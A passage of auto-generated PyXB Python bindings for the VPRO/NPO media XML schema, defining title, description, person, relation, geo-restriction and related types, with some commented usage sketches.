__avType._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 317, 4)
avType = property(__avType.value, __avType.set, None, None)
# Attribute sortDate uses Python identifier sortDate
__sortDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'sortDate'), 'sortDate', '__urnvpromedia2009_baseMediaType_sortDate', pyxb.binding.datatypes.dateTime)
__sortDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 318, 4)
__sortDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 318, 4)
sortDate = property(__sortDate.value, __sortDate.set, None, None)
# Attribute embeddable uses Python identifier embeddable
__embeddable = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'embeddable'), 'embeddable', '__urnvpromedia2009_baseMediaType_embeddable', pyxb.binding.datatypes.boolean, unicode_default='true')
__embeddable._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 319, 4)
__embeddable._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 319, 4)
embeddable = property(__embeddable.value, __embeddable.set, None, None)
# Attribute hasSubtitles uses Python identifier hasSubtitles
__hasSubtitles = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'hasSubtitles'), 'hasSubtitles', '__urnvpromedia2009_baseMediaType_hasSubtitles', pyxb.binding.datatypes.boolean, unicode_default='false')
__hasSubtitles._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 320, 4)
__hasSubtitles._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 320, 4)
hasSubtitles = property(__hasSubtitles.value, __hasSubtitles.set, None, None)
# Attribute mergedTo uses Python identifier mergedTo
__mergedTo = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'mergedTo'), 'mergedTo', '__urnvpromedia2009_baseMediaType_mergedTo', _module_typeBindings.midType)
__mergedTo._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 322, 4)
__mergedTo._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 322, 4)
mergedTo = property(__mergedTo.value, __mergedTo.set, None, None)
# Attribute urn uses Python identifier urn
__urn = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urn'), 'urn', '__urnvpromedia2009_baseMediaType_urn', pyxb.binding.datatypes.anyURI)
__urn._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 11, 4)
__urn._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 11, 4)
urn = property(__urn.value, __urn.set, None, None)
# Attribute publishStart uses Python identifier publishStart
__publishStart = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStart'), 'publishStart', '__urnvpromedia2009_baseMediaType_publishStart', pyxb.binding.datatypes.dateTime)
__publishStart._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 12, 4)
__publishStart._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 12, 4)
publishStart = property(__publishStart.value, __publishStart.set, None, None)
# Attribute publishStop uses Python identifier publishStop
__publishStop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStop'), 'publishStop', '__urnvpromedia2009_baseMediaType_publishStop', pyxb.binding.datatypes.dateTime)
__publishStop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 13, 4)
__publishStop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 13, 4)
publishStop = property(__publishStop.value, __publishStop.set, None, None)
# Attribute publishDate uses Python identifier publishDate
__publishDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishDate'), 'publishDate', '__urnvpromedia2009_baseMediaType_publishDate', pyxb.binding.datatypes.dateTime)
__publishDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 14, 4)
__publishDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 14, 4)
publishDate = property(__publishDate.value, __publishDate.set, None, None)
# Attribute creationDate uses Python identifier creationDate
__creationDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'creationDate'), 'creationDate', '__urnvpromedia2009_baseMediaType_creationDate', pyxb.binding.datatypes.dateTime)
__creationDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 15, 4)
__creationDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 15, 4)
creationDate = property(__creationDate.value, __creationDate.set, None, None)
# Attribute lastModified uses Python identifier lastModified
__lastModified = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'lastModified'), 'lastModified', '__urnvpromedia2009_baseMediaType_lastModified', pyxb.binding.datatypes.dateTime)
__lastModified._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 16, 4)
__lastModified._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 16, 4)
lastModified = property(__lastModified.value, __lastModified.set, None, None)
# Attribute workflow uses Python identifier workflow
__workflow = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'workflow'), 'workflow', '__urnvpromedia2009_baseMediaType_workflow', _ImportedBinding_npoapi_xml_shared.workflowEnumType)
__workflow._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 17, 4)
__workflow._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 17, 4)
workflow = property(__workflow.value, __workflow.set, None, None)
_ElementMap.update({
__crid.name() : __crid,
__broadcaster.name() : __broadcaster,
__portal.name() : __portal,
__exclusive.name() : __exclusive,
__region.name() : __region,
__title.name() : __title,
__description.name() : __description,
__genre.name() : __genre,
__tag.name() : __tag,
__intentions.name() : __intentions,
__targetGroups.name() : __targetGroups,
__geoLocations.name() : __geoLocations,
__topics.name() : __topics,
__source.name() : __source,
__country.name() : __country,
__language.name() : __language,
__isDubbed.name() : __isDubbed,
__availableSubtitles.name() : __availableSubtitles,
__avAttributes.name() : __avAttributes,
__releaseYear.name() : __releaseYear,
__duration.name() : __duration,
__credits.name() : __credits,
__award.name() : __award,
__descendantOf.name() : __descendantOf,
__memberOf.name() : __memberOf,
__ageRating.name() : __ageRating,
__contentRating.name() : __contentRating,
__email.name() : __email,
__website.name() : __website,
__twitter.name() : __twitter,
__teletext.name() : __teletext,
__prediction.name() : __prediction,
__locations.name() : __locations,
__relation.name() : __relation,
__images.name() : __images
})
_AttributeMap.update({
__mid.name() : __mid,
__avType.name() : __avType,
__sortDate.name() : __sortDate,
__embeddable.name() : __embeddable,
__hasSubtitles.name() : __hasSubtitles,
__mergedTo.name() : __mergedTo,
__urn.name() : __urn,
__publishStart.name() : __publishStart,
__publishStop.name() : __publishStop,
__publishDate.name() : __publishDate,
__creationDate.name() : __creationDate,
__lastModified.name() : __lastModified,
__workflow.name() : __workflow
})
_module_typeBindings.baseMediaType = baseMediaType
Namespace.addCategoryObject('typeBinding', 'baseMediaType', baseMediaType)
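# Usage sketch (editorial addition): baseMediaType is abstract (_Abstract = True), so
# instances are only obtained through concrete subtypes (programs, groups, segments),
# typically parsed from XML. Assuming the CreateFromDocument() helper that PyXB emits
# at module level and some document text in xml_text:
#
#   media = CreateFromDocument(xml_text)         # returns a concrete subtype instance
#   media.mid, media.avType, media.embeddable   # attributes declared on this base type
#   [t.value() for t in media.title]            # repeated elements come back as lists
#   baseMediaType()                              # raises pyxb.AbstractInstantiationError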
# Complex type {urn:vpro:media:2009}geoRestrictionType with content type SIMPLE
class geoRestrictionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}geoRestrictionType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoRestrictionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 339, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute start uses Python identifier start
__start = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'start'), 'start', '__urnvpromedia2009_geoRestrictionType_start', pyxb.binding.datatypes.dateTime)
__start._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 326, 4)
__start._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 326, 4)
start = property(__start.value, __start.set, None, None)
# Attribute stop uses Python identifier stop
__stop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'stop'), 'stop', '__urnvpromedia2009_geoRestrictionType_stop', pyxb.binding.datatypes.dateTime)
__stop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 327, 4)
__stop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 327, 4)
stop = property(__stop.value, __stop.set, None, None)
# Attribute regionId uses Python identifier regionId
__regionId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'regionId'), 'regionId', '__urnvpromedia2009_geoRestrictionType_regionId', _module_typeBindings.geoRestrictionEnum)
__regionId._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 342, 8)
__regionId._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 342, 8)
regionId = property(__regionId.value, __regionId.set, None, None)
# Attribute platform uses Python identifier platform
__platform = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'platform'), 'platform', '__urnvpromedia2009_geoRestrictionType_platform', _module_typeBindings.platformTypeEnum)
__platform._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 344, 8)
__platform._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 344, 8)
platform = property(__platform.value, __platform.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__start.name() : __start,
__stop.name() : __stop,
__regionId.name() : __regionId,
__platform.name() : __platform
})
_module_typeBindings.geoRestrictionType = geoRestrictionType
Namespace.addCategoryObject('typeBinding', 'geoRestrictionType', geoRestrictionType)
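# Usage sketch (editorial addition): geoRestrictionType wraps simple string content
# with the windowing attributes above. Per the region documentation earlier in this
# module the known regions are NL, BENELUX and WORLD; treating 'NL' as valid for both
# the content and the regionId enum is an assumption.
#
#   geo = geoRestrictionType('NL', regionId='NL')
#   geo.value(), geo.regionId         # value() returns the simple string content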
# Complex type {urn:vpro:media:2009}titleType with content type SIMPLE
class titleType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}titleType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'titleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 364, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_titleType_type', _module_typeBindings.textualTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 389, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 389, 4)
type = property(__type.value, __type.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_titleType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 390, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 390, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__type.name() : __type,
__owner.name() : __owner
})
_module_typeBindings.titleType = titleType
Namespace.addCategoryObject('typeBinding', 'titleType', titleType)
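# Usage sketch (editorial addition): titleType wraps string content with a textual
# type and a required owner; MAIN and BROADCASTER are taken from the title
# documentation on baseMediaType above, while the title text itself is hypothetical.
# descriptionType directly below has exactly the same shape.
#
#   t = titleType('Tegenlicht', type='MAIN', owner='BROADCASTER')
#   t.value()                         # 'Tegenlicht' -- the simple string content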
# Complex type {urn:vpro:media:2009}descriptionType with content type SIMPLE
class descriptionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}descriptionType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'descriptionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 380, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_descriptionType_type', _module_typeBindings.textualTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 389, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 389, 4)
type = property(__type.value, __type.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_descriptionType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 390, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 390, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__type.name() : __type,
__owner.name() : __owner
})
_module_typeBindings.descriptionType = descriptionType
Namespace.addCategoryObject('typeBinding', 'descriptionType', descriptionType)
# Complex type {urn:vpro:media:2009}organizationType with content type SIMPLE
class organizationType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}organizationType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'organizationType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 447, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'id'), 'id', '__urnvpromedia2009_organizationType_id', _module_typeBindings.organizationIdType)
__id._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 450, 8)
__id._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 450, 8)
id = property(__id.value, __id.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__id.name() : __id
})
_module_typeBindings.organizationType = organizationType
Namespace.addCategoryObject('typeBinding', 'organizationType', organizationType)
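# Usage sketch (editorial addition): organizationType pairs a display string with an
# optional id attribute (organizationIdType); 'VPRO' is a hypothetical broadcaster id.
#
#   org = organizationType('VPRO', id='VPRO')
#   org.value(), org.id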
# Complex type {urn:vpro:media:2009}personType with content type ELEMENT_ONLY
class personType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}personType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'personType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 551, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}givenName uses Python identifier givenName
__givenName = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'givenName'), 'givenName', '__urnvpromedia2009_personType_urnvpromedia2009givenName', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 553, 6), )
givenName = property(__givenName.value, __givenName.set, None, None)
# Element {urn:vpro:media:2009}familyName uses Python identifier familyName
__familyName = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'familyName'), 'familyName', '__urnvpromedia2009_personType_urnvpromedia2009familyName', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 554, 6), )
familyName = property(__familyName.value, __familyName.set, None, None)
# Attribute role uses Python identifier role
__role = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'role'), 'role', '__urnvpromedia2009_personType_role', _module_typeBindings.roleType, required=True)
__role._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 556, 4)
__role._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 556, 4)
role = property(__role.value, __role.set, None, None)
# Attribute gtaaUri uses Python identifier gtaaUri
__gtaaUri = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaUri'), 'gtaaUri', '__urnvpromedia2009_personType_gtaaUri', pyxb.binding.datatypes.string)
__gtaaUri._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 557, 4)
__gtaaUri._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 557, 4)
gtaaUri = property(__gtaaUri.value, __gtaaUri.set, None, None)
# Attribute gtaaStatus uses Python identifier gtaaStatus
__gtaaStatus = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaStatus'), 'gtaaStatus', '__urnvpromedia2009_personType_gtaaStatus', _module_typeBindings.gtaaStatusType)
__gtaaStatus._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 558, 4)
__gtaaStatus._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 558, 4)
gtaaStatus = property(__gtaaStatus.value, __gtaaStatus.set, None, None)
_ElementMap.update({
__givenName.name() : __givenName,
__familyName.name() : __familyName
})
_AttributeMap.update({
__role.name() : __role,
__gtaaUri.name() : __gtaaUri,
__gtaaStatus.name() : __gtaaStatus
})
_module_typeBindings.personType = personType
Namespace.addCategoryObject('typeBinding', 'personType', personType)
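# Usage sketch (editorial addition): personType takes its child elements as
# constructor keywords, and role is its only required attribute. The role value and
# GTAA URI below are hypothetical, since roleType's members are defined elsewhere.
#
#   p = personType(givenName='Jan', familyName='Jansen', role='DIRECTOR',
#                  gtaaUri='http://data.beeldengeluid.nl/gtaa/123456')
#   p.familyName, p.role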
# Complex type {urn:vpro:media:2009}nameType with content type ELEMENT_ONLY
class nameType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}nameType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'nameType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 561, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}name uses Python identifier name
__name = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'name'), 'name', '__urnvpromedia2009_nameType_urnvpromedia2009name', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 563, 6), )
name = property(__name.value, __name.set, None, None)
# Element {urn:vpro:media:2009}scopeNote uses Python identifier scopeNote
__scopeNote = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), 'scopeNote', '__urnvpromedia2009_nameType_urnvpromedia2009scopeNote', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 564, 6), )
scopeNote = property(__scopeNote.value, __scopeNote.set, None, None)
# Attribute role uses Python identifier role
__role = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'role'), 'role', '__urnvpromedia2009_nameType_role', _module_typeBindings.roleType, required=True)
__role._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 566, 4)
__role._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 566, 4)
role = property(__role.value, __role.set, None, None)
# Attribute gtaaUri uses Python identifier gtaaUri
__gtaaUri = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaUri'), 'gtaaUri', '__urnvpromedia2009_nameType_gtaaUri', pyxb.binding.datatypes.string)
__gtaaUri._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 567, 4)
__gtaaUri._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 567, 4)
gtaaUri = property(__gtaaUri.value, __gtaaUri.set, None, None)
# Attribute gtaaStatus uses Python identifier gtaaStatus
__gtaaStatus = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaStatus'), 'gtaaStatus', '__urnvpromedia2009_nameType_gtaaStatus', _module_typeBindings.gtaaStatusType)
__gtaaStatus._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 568, 4)
__gtaaStatus._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 568, 4)
gtaaStatus = property(__gtaaStatus.value, __gtaaStatus.set, None, None)
_ElementMap.update({
__name.name() : __name,
__scopeNote.name() : __scopeNote
})
_AttributeMap.update({
__role.name() : __role,
__gtaaUri.name() : __gtaaUri,
__gtaaStatus.name() : __gtaaStatus
})
_module_typeBindings.nameType = nameType
Namespace.addCategoryObject('typeBinding', 'nameType', nameType)
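# Usage sketch (editorial addition): nameType mirrors personType for non-person
# credits: one name element plus zero or more scopeNote elements. The values are
# hypothetical; appending a plain string relies on PyXB coercing it to the element's
# simple type.
#
#   n = nameType(name='Metropole Orkest', role='COMPOSER')
#   n.scopeNote.append('orchestra')   # scopeNote is a repeated (list-valued) element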
# Complex type {urn:vpro:media:2009}relationType with content type SIMPLE
class relationType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}relationType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'relationType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 644, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_relationType_type', _module_typeBindings.relationTypeType, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 647, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 647, 8)
type = property(__type.value, __type.set, None, None)
# Attribute broadcaster uses Python identifier broadcaster
__broadcaster = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'broadcaster'), 'broadcaster', '__urnvpromedia2009_relationType_broadcaster', pyxb.binding.datatypes.string, required=True)
__broadcaster._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 648, 8)
__broadcaster._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 648, 8)
broadcaster = property(__broadcaster.value, __broadcaster.set, None, None)
# Attribute uriRef uses Python identifier uriRef
__uriRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'uriRef'), 'uriRef', '__urnvpromedia2009_relationType_uriRef', pyxb.binding.datatypes.anyURI)
__uriRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 649, 8)
__uriRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 649, 8)
uriRef = property(__uriRef.value, __uriRef.set, None, None)
# Attribute urn uses Python identifier urn
__urn = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urn'), 'urn', '__urnvpromedia2009_relationType_urn', pyxb.binding.datatypes.anyURI)
__urn._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 650, 8)
__urn._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 650, 8)
urn = property(__urn.value, __urn.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__type.name() : __type,
__broadcaster.name() : __broadcaster,
__uriRef.name() : __uriRef,
__urn.name() : __urn
})
_module_typeBindings.relationType = relationType
Namespace.addCategoryObject('typeBinding', 'relationType', relationType)
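# Usage sketch (editorial addition): relationType couples string content with a
# typed, broadcaster-scoped link; type and broadcaster are required. The type value
# below is hypothetical, since relationTypeType's members are defined elsewhere.
#
#   rel = relationType('3VOOR12', type='LABEL', broadcaster='VPRO')
#   rel.uriRef = 'https://3voor12.vpro.nl/'   # optional anyURI attribute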
# Complex type {urn:vpro:media:2009}twitterType with content type SIMPLE
class twitterType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}twitterType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'twitterType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 689, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_twitterType_type', _module_typeBindings.STD_ANON)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 692, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 692, 8)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__type.name() : __type
})
_module_typeBindings.twitterType = twitterType
Namespace.addCategoryObject('typeBinding', 'twitterType', twitterType)
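# Usage sketch (editorial addition): twitterType holds a handle or hashtag as string
# content; its anonymous type attribute (STD_ANON) is an enumeration whose members
# are not visible here, so 'ACCOUNT' is a hypothetical value.
#
#   tw = twitterType('@vpro', type='ACCOUNT')
#   tw.value(), tw.type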
# Complex type {urn:vpro:media:2009}scheduleType with content type ELEMENT_ONLY
class scheduleType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 711, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}scheduleEvent uses Python identifier scheduleEvent
__scheduleEvent = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), 'scheduleEvent', '__urnvpromedia2009_scheduleType_urnvpromedia2009scheduleEvent', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 713, 6), )
scheduleEvent = property(__scheduleEvent.value, __scheduleEvent.set, None, None)
# Attribute channel uses Python identifier channel
